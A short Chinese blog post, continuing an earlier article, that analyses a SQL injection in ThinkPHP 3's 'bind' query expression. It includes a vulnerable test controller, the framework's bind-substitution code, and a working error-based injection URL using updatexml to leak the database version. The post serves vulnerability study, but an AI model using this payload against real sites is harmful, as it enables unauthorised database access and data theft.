接着上篇 https://www.cnblogs.com/cuocuo/p/14329868.html
当exp为bind的时候,虽然会拼接,但是find()和select()是没办法利用的,我们需要更改一下代码
<?php namespace Home\Controller; use Think\Controller; use \Think\Logs; class IndexController extends Controller { public function index(){ $User = M("user"); $user[‘Id‘] = I(‘id‘); $data[‘pwd‘] = I(‘pwd‘); $value = $User->where($user)->save($data); var_dump($value); } }
http://127.0.0.1/?id[0]=bind&id[1]=123&pwd=cuocuo
跟进$this->execute()
$this->queryStr = strtr($this->queryStr,array_map(function($val) use($that){ return ‘\‘‘.$that->escapeString($val).‘\‘‘; },$this->bind));
可以看到:0已经被替换成cuocuo了,后面的:123怎么办,我们将其改成:0就可以满足替换条件了
http://127.0.0.1/?id[0]=bind&id[1]=0%20and%20updatexml(1,concat(0x7e,(SELECT%20@@version),0x7e),1)&pwd=cuocuo